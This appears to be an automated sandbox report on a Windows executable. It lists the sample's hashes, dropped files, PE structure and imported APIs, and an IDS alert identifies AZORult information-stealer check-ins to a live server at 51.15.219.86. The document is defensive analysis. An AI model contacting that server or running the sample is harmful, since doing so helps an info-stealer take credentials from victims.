                                                                                                                                      Preview:.[0]..Path=C:\Users\user\Desktop..Caption=Desktop..ItemType=0..GroupIndex=0....[1]..Path=C:\Users\user\Downloads..Caption=Downloads..ItemType=0..GroupIndex=0....[2]..Path=C:\Users\user\Documents..Caption=Documents..ItemType=0..GroupIndex=0....[3]..Path=C:\Users\user\Pictures..Caption=Pictures..ItemType=0..GroupIndex=0....[4]..Path=C:\Users\user\Music..Caption=Music..ItemType=0..GroupIndex=0....[5]..Path=C:\Users\user\Videos..Caption=Videos..ItemType=0..GroupIndex=0....[6]..Path=Libraries..Caption=Libraries..ItemType=0..GroupIndex=0....[7]..Path=Recycle Bin..Caption=Recycle Bin..ItemType=0..GroupIndex=0....[8]..Path=..Caption=This PC..ItemType=0..GroupIndex=0....[9]..Path=C:..Caption=Local Disk (C:)..ItemType=0..GroupIndex=0....[10]..Path=D:..Caption=DVD Drive (D:)..ItemType=0..GroupIndex=0....[11]..Path=c:\windows\notepad.exe..Caption=Notepad..ItemType=0..GroupIndex=0....[12]..Path=c:\windows\System32\calc.exe..Caption=Calculator..ItemType=0..GroupIndex=0....[IntegrityCheckingS
                                                                                                                                      Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1029
                                                                                                                                      Entropy (8bit):5.073046635157514
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:ilPKE3YE39E3IE3ZE3nVmxE3vxE36TpE3laNE3RE3zE3ZjxE3Fg9lKE34G:eSFIt4kVciz+aNoeABMjG
                                                                                                                                      MD5:F5561BEACF73E8F22AE653BCB64E2E75
                                                                                                                                      SHA1:7E2040EA37E77A593B16F66131958C9BC39B14F5
                                                                                                                                      SHA-256:DD3B1B6E081034B6EA7B43FA7BCD2E008F7228A89014ECF8465863ADB8C04CD3
                                                                                                                                      SHA-512:96F65778464684030AA2A31422EE7A5CC4683C6C975DB600C4CFEBD5B9ED8CC1B9213F07A2B3EBBDB73868C44CCE027999C6CC6B61AFD30864434E741D38EF4F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.[0]..Path=C:\Users\user\Desktop..Caption=Desktop..ItemType=0..GroupIndex=0....[1]..Path=C:\Users\user\Downloads..Caption=Downloads..ItemType=0..GroupIndex=0....[2]..Path=C:\Users\user\Documents..Caption=Documents..ItemType=0..GroupIndex=0....[3]..Path=C:\Users\user\Pictures..Caption=Pictures..ItemType=0..GroupIndex=0....[4]..Path=C:\Users\user\Music..Caption=Music..ItemType=0..GroupIndex=0....[5]..Path=C:\Users\user\Videos..Caption=Videos..ItemType=0..GroupIndex=0....[6]..Path=Libraries..Caption=Libraries..ItemType=0..GroupIndex=0....[7]..Path=Recycle Bin..Caption=Recycle Bin..ItemType=0..GroupIndex=0....[8]..Path=..Caption=This PC..ItemType=0..GroupIndex=0....[9]..Path=C:..Caption=Local Disk (C:)..ItemType=0..GroupIndex=0....[10]..Path=D:..Caption=DVD Drive (D:)..ItemType=0..GroupIndex=0....[11]..Path=c:\windows\notepad.exe..Caption=Notepad..ItemType=0..GroupIndex=0....[12]..Path=c:\windows\System32\calc.exe..Caption=Calculator..ItemType=0..GroupIndex=0....[IntegrityCheckingS
                                                                                                                                      Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                      Category:modified
                                                                                                                                      Size (bytes):288
                                                                                                                                      Entropy (8bit):3.3878200727856553
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:QS4lulC+Sk2lAmEoclcoalulC+Sk2lAmEoclcSYloUrMJ2wlw:QArqjEoctrqjEocNUQJbw
                                                                                                                                      MD5:788B4E2858A3B93491324C1F07EBD67F
                                                                                                                                      SHA1:391D669F1CC143E639379333FBA482DDFEE3D0B6
                                                                                                                                      SHA-256:BACD4610EC7AA70AFA2F49918C7C4D6FF5759BEC389C69BCD8C3ACB355E5E515
                                                                                                                                      SHA-512:DC42DBD51C763BAA27811FF6412DBB546652D6A4419D5946E1DB852DA1366AACBB8C7E88A6B7CD46B8424F830FDFD4E66AF12B937FFFB9457848CFB40B3B843A
                                                                                                                                      Malicious:false
Preview:
8:09:08 AM : ImportWindowsSettings PARAMS: begin
8:08:49 AM : ImportWindowsSettings PARAMS: begin
8:09:06 AM : FolderInit PARAMS: SetHook
                                                                                                                                      Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                      Category:modified
                                                                                                                                      Size (bytes):8194
                                                                                                                                      Entropy (8bit):3.6321159563727923
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:YOX1UqlrOAo4oKLtaaaaaaiaISgVWHpLo:bW9
                                                                                                                                      MD5:EC1CF0F190E6728DA95AB1DBE6A93374
                                                                                                                                      SHA1:19BC26774E10E9340A9FDD29188E9E18CE3A1375
                                                                                                                                      SHA-256:E51205743E68B14B59AA74652810B63E04B5ABCCF9B9CFF1CD53EEABAD3294EF
                                                                                                                                      SHA-512:DC08717BE83DA8635B718FC8A73EEC8257B3CA3967E193D1BD286C480156F3E0285F202624D43D872A4C62287113811DC54557892B1695AFDF6DC7871BC67905
                                                                                                                                      Malicious:false
Preview:
8:08:44 AM : DeleteFromScheduler PARAMS: DeleteTask fail Chameleon Folder-hardz
8:08:44 AM : LaunchThroughScheduler PARAMS: Start
8:08:44 AM : LaunchThroughScheduler PARAMS: IsNew=Chameleon Folder-hardz
8:08:46 AM : TrySchedulerStart PARAMS: Already evaluated
8:08:49 AM : FolderInit PARAMS: SetHook
8:08:52 AM : Add PARAMS: DisplayPath=Desktop
8:08:52 AM : Add PARAMS: DisplayName=Desktop
8:08:52 AM : Add PARAMS: Name=Desktop
8:08:52 AM : Add PARAMS: Path=C:\Users\hardz\Desktop
8:08:52 A
                                                                                                                                      Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                      Category:modified
                                                                                                                                      Size (bytes):50904
                                                                                                                                      Entropy (8bit):3.66453863264879
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:JbbAHcu7bbAHcuubbAHcuxbbAHcuCbbAHcuRbbAHcuobbAHcuNbbAHcu5bbAHcuB:JbbAHcu7bbAHcuubbAHcuxbbAHcuCbbB
                                                                                                                                      MD5:3CB71EFDF11307DF2C8A6D6D8D2012AF
                                                                                                                                      SHA1:6645EE91BA2475F7C3A5204D86F3FB1575DE4A97
                                                                                                                                      SHA-256:F691E143E5D22F123EE1C5658D7241FF2BB4D731216FB1DFE6CBB70306BD9542
                                                                                                                                      SHA-512:2FEAA74A89EB6062E966661EC3AE1BFF274E253779B4DD9E818B740CCFD31A5CDFF20E564C532AF1955A03D976D5ABC7F9883609C73BC29E7EBC551BE42AB568
                                                                                                                                      Malicious:false
Preview:
2/22/2023 8:08:52 AM: ERROR (): GetFolderExplorerHandle MESS: Result empty
Last system error: The operation completed successfully (0)
CompileTime: 24-12-2016 14-17
Terminated: False
IsProgramTerminated: False
Product: Windows 10 Pro
Service Pack:
Build: 0
Version: 64-bit
UAC: enabled
UAC: elevated
TotalPhysicalMemory: 8191
PhysicalMemoryLoad: 67
SwapFileSize: 1353
SwapFileUsage: 17
Monitor 0: L: 0 T: 0 W: 1280 H: 1024 IsMain: 1 WL: WT: 0 0 WR: 0 WB: 40
ChameleonExplorer.exe 12
                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Entropy (8bit):7.958481869612443
                                                                                                                                      TrID:
                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                      File name:B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                                                                                                                                      File size:8148480
                                                                                                                                      MD5:894fce964d09231b2b271fbf5afd4806
                                                                                                                                      SHA1:bf0c85400eef6e222b41eed1f02345c6b00c1dfa
                                                                                                                                      SHA256:b7cfd1d0aad8b5d5db5c17da0519b1d18ec7663699f2b8fedd0628e2bfacb6e5
                                                                                                                                      SHA512:29eff9314c3425ecfcca16f608748d27d5f327fa3f029be9c5d0643977ce33b118a5201dac1921417121eee628b21629ce15d99c7bf002772d6472e57c60254f
                                                                                                                                      SSDEEP:196608:wCKG8hIdB4LC4BgRexpA4O1Xq7pZIBVIAg26FsluEMC/WpsvkCesIGf:TYo4m4iwg/qfDLKEC/WSvkCeH
                                                                                                                                      TLSH:AE862312B7E28031FFA7A2739B66F64546BC7D258123962F13581C7DBC741A2263E363
                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
                                                                                                                                      Icon Hash:aab2e3e39383aa00
                                                                                                                                      Entrypoint:0x42800a
                                                                                                                                      Entrypoint Section:.text
                                                                                                                                      Digitally signed:false
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      Subsystem:windows gui
                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                      Time Stamp:0x5BAE46BA [Fri Sep 28 15:20:26 2018 UTC]
                                                                                                                                      TLS Callbacks:
                                                                                                                                      CLR (.Net) Version:
                                                                                                                                      OS Version Major:5
                                                                                                                                      OS Version Minor:1
                                                                                                                                      File Version Major:5
                                                                                                                                      File Version Minor:1
                                                                                                                                      Subsystem Version Major:5
                                                                                                                                      Subsystem Version Minor:1
                                                                                                                                      Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                                                                                                      Instruction
                                                                                                                                      call 00007FD174F52B6Dh
                                                                                                                                      jmp 00007FD174F45924h
                                                                                                                                      int3
                                                                                                                                      int3
                                                                                                                                      int3
                                                                                                                                      int3
                                                                                                                                      int3
                                                                                                                                      int3
                                                                                                                                      int3
                                                                                                                                      int3
                                                                                                                                      int3
                                                                                                                                      int3
                                                                                                                                      int3
                                                                                                                                      int3
                                                                                                                                      push edi
                                                                                                                                      push esi
                                                                                                                                      mov esi, dword ptr [esp+10h]
                                                                                                                                      mov ecx, dword ptr [esp+14h]
                                                                                                                                      mov edi, dword ptr [esp+0Ch]
                                                                                                                                      mov eax, ecx
                                                                                                                                      mov edx, ecx
                                                                                                                                      add eax, esi
                                                                                                                                      cmp edi, esi
                                                                                                                                      jbe 00007FD174F45AAAh
                                                                                                                                      cmp edi, eax
                                                                                                                                      jc 00007FD174F45E0Eh
                                                                                                                                      bt dword ptr [004C41FCh], 01h
                                                                                                                                      jnc 00007FD174F45AA9h
                                                                                                                                      rep movsb
                                                                                                                                      jmp 00007FD174F45DBCh
                                                                                                                                      cmp ecx, 00000080h
                                                                                                                                      jc 00007FD174F45C74h
                                                                                                                                      mov eax, edi
                                                                                                                                      xor eax, esi
                                                                                                                                      test eax, 0000000Fh
                                                                                                                                      jne 00007FD174F45AB0h
                                                                                                                                      bt dword ptr [004BF324h], 01h
                                                                                                                                      jc 00007FD174F45F80h
                                                                                                                                      bt dword ptr [004C41FCh], 00000000h
                                                                                                                                      jnc 00007FD174F45C4Dh
                                                                                                                                      test edi, 00000003h
                                                                                                                                      jne 00007FD174F45C5Eh
                                                                                                                                      test esi, 00000003h
                                                                                                                                      jne 00007FD174F45C3Dh
                                                                                                                                      bt edi, 02h
                                                                                                                                      jnc 00007FD174F45AAFh
                                                                                                                                      mov eax, dword ptr [esi]
                                                                                                                                      sub ecx, 04h
                                                                                                                                      lea esi, dword ptr [esi+04h]
                                                                                                                                      mov dword ptr [edi], eax
                                                                                                                                      lea edi, dword ptr [edi+04h]
                                                                                                                                      bt edi, 03h
                                                                                                                                      jnc 00007FD174F45AB3h
                                                                                                                                      movq xmm1, qword ptr [esi]
                                                                                                                                      sub ecx, 08h
                                                                                                                                      lea esi, dword ptr [esi+08h]
                                                                                                                                      movq qword ptr [edi], xmm1
                                                                                                                                      lea edi, dword ptr [edi+08h]
                                                                                                                                      test esi, 00000007h
                                                                                                                                      je 00007FD174F45B05h
                                                                                                                                      bt esi, 03h
                                                                                                                                      Programming Language:
                                                                                                                                      • [ASM] VS2013 build 21005
                                                                                                                                      • [ C ] VS2013 build 21005
                                                                                                                                      • [C++] VS2013 build 21005
                                                                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                                                                      • [ASM] VS2013 UPD5 build 40629
                                                                                                                                      • [RES] VS2013 build 21005
                                                                                                                                      • [LNK] VS2013 UPD5 build 40629
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xbc0cc          0x17c         .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xc8000          0x6faf2c      .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x7c3000         0x7134        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x92bc0          0x1c          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0xa4b50          0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x8f000          0x884         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity      File Type  Entropy             Characteristics
.text   0x1000           0x8dfdd       0x8e000   False     0.5735602580325704   data       6.675248351711057   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x8f000          0x2fd8e       0x2fe00   False     0.32828818537859006  data       5.763244005758284   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0xbf000          0x8f74        0x5200    False     0.1017530487804878   data       1.1963819235530628  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0xc8000          0x6faf2c      0x6fb000  unknown   unknown              unknown    unknown             IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x7c3000         0x7134        0x7200    False     0.7617530153508771   data       6.783955557128661   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name           RVA       Size      Type                                                               Language  Country
RT_ICON        0xc84a0   0x128     Device independent bitmap graphic, 16 x 32 x 4, image size 192     English   Great Britain
RT_ICON        0xc85c8   0x2e8     Device independent bitmap graphic, 32 x 64 x 4, image size 0       English   Great Britain
RT_ICON        0xc88b0   0x128     Device independent bitmap graphic, 16 x 32 x 4, image size 0       English   Great Britain
RT_ICON        0xc89d8   0xea8     Device independent bitmap graphic, 48 x 96 x 8, image size 0       English   Great Britain
RT_ICON        0xc9880   0x8a8     Device independent bitmap graphic, 32 x 64 x 8, image size 0       English   Great Britain
RT_ICON        0xca128   0x568     Device independent bitmap graphic, 16 x 32 x 8, image size 0       English   Great Britain
RT_ICON        0xca690   0x25a8    Device independent bitmap graphic, 48 x 96 x 32, image size 0      English   Great Britain
RT_ICON        0xccc38   0x10a8    Device independent bitmap graphic, 32 x 64 x 32, image size 0      English   Great Britain
RT_ICON        0xcdce0   0x468     Device independent bitmap graphic, 16 x 32 x 32, image size 0      English   Great Britain
RT_STRING      0xce148   0x594     data                                                               English   Great Britain
RT_STRING      0xce6dc   0x68a     data                                                               English   Great Britain
RT_STRING      0xced68   0x490     data                                                               English   Great Britain
RT_STRING      0xcf1f8   0x5fc     data                                                               English   Great Britain
RT_STRING      0xcf7f4   0x65c     data                                                               English   Great Britain
RT_STRING      0xcfe50   0x466     data                                                               English   Great Britain
RT_STRING      0xd02b8   0x158     Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0   English   Great Britain
RT_RCDATA      0xd0410   0x6f25c2  data
RT_GROUP_ICON  0x7c29d4  0x76      data                                                               English   Great Britain
RT_GROUP_ICON  0x7c2a4c  0x14      data                                                               English   Great Britain
RT_VERSION     0x7c2a60  0xdc      data                                                               English   Great Britain
RT_MANIFEST    0x7c2b3c  0x3ef     ASCII text, with CRLF line terminators                             English   Great Britain
DLL           Import
WSOCK32.dll   WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll   GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll     timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll  ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll       WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll   InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL     GetProcessMemoryInfo
IPHLPAPI.DLL  IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll   DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll   IsThemeActive
KERNEL32.dll  DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll    AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll     StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll  GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll  GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll   DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll     CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll  LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system  Country where language is spoken
English                         Great Britain
Timestamp                 Protocol  SID      Message                                           Source Port  Dest Port  Source IP    Dest IP
02/22/23-08:09:18.995725  TCP       2029465  ET TROJAN Win32/AZORult V3.2 Client Checkin M15   49709        80         192.168.2.3  51.15.219.86
02/22/23-08:09:18.626942  TCP       2029465  ET TROJAN Win32/AZORult V3.2 Client Checkin M15   49708        80         192.168.2.3  51.15.219.86
Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                                                                                      Feb 22, 2023 08:08:35.886305094 CET44349705142.250.184.84192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:35.886384964 CET49705443192.168.2.3142.250.184.84
                                                                                                                                      Feb 22, 2023 08:08:35.886447906 CET44349705142.250.184.84192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:35.886518955 CET49705443192.168.2.3142.250.184.84
                                                                                                                                      Feb 22, 2023 08:08:36.059093952 CET49705443192.168.2.3142.250.184.84
                                                                                                                                      Feb 22, 2023 08:08:36.059154987 CET44349705142.250.184.84192.168.2.3
                                                                                                                                      Feb 22, 2023 08:08:40.758264065 CET4970480192.168.2.3142.250.180.147
                                                                                                                                      Feb 22, 2023 08:09:17.032350063 CET4970780192.168.2.3142.250.180.147
                                                                                                                                      Feb 22, 2023 08:09:17.053451061 CET8049707142.250.180.147192.168.2.3
                                                                                                                                      Feb 22, 2023 08:09:17.053560972 CET4970780192.168.2.3142.250.180.147
                                                                                                                                      Feb 22, 2023 08:09:17.093458891 CET4970780192.168.2.3142.250.180.147
                                                                                                                                      Feb 22, 2023 08:09:17.114628077 CET8049707142.250.180.147192.168.2.3
                                                                                                                                      Feb 22, 2023 08:09:17.252588034 CET8049707142.250.180.147192.168.2.3
                                                                                                                                      Feb 22, 2023 08:09:17.252793074 CET4970780192.168.2.3142.250.180.147
                                                                                                                                      Feb 22, 2023 08:09:18.590078115 CET4970880192.168.2.351.15.219.86
                                                                                                                                      Feb 22, 2023 08:09:18.622257948 CET804970851.15.219.86192.168.2.3
                                                                                                                                      Feb 22, 2023 08:09:18.622584105 CET4970880192.168.2.351.15.219.86
                                                                                                                                      Feb 22, 2023 08:09:18.626941919 CET4970880192.168.2.351.15.219.86
                                                                                                                                      Feb 22, 2023 08:09:18.655373096 CET804970851.15.219.86192.168.2.3
                                                                                                                                      Feb 22, 2023 08:09:18.950828075 CET804970851.15.219.86192.168.2.3
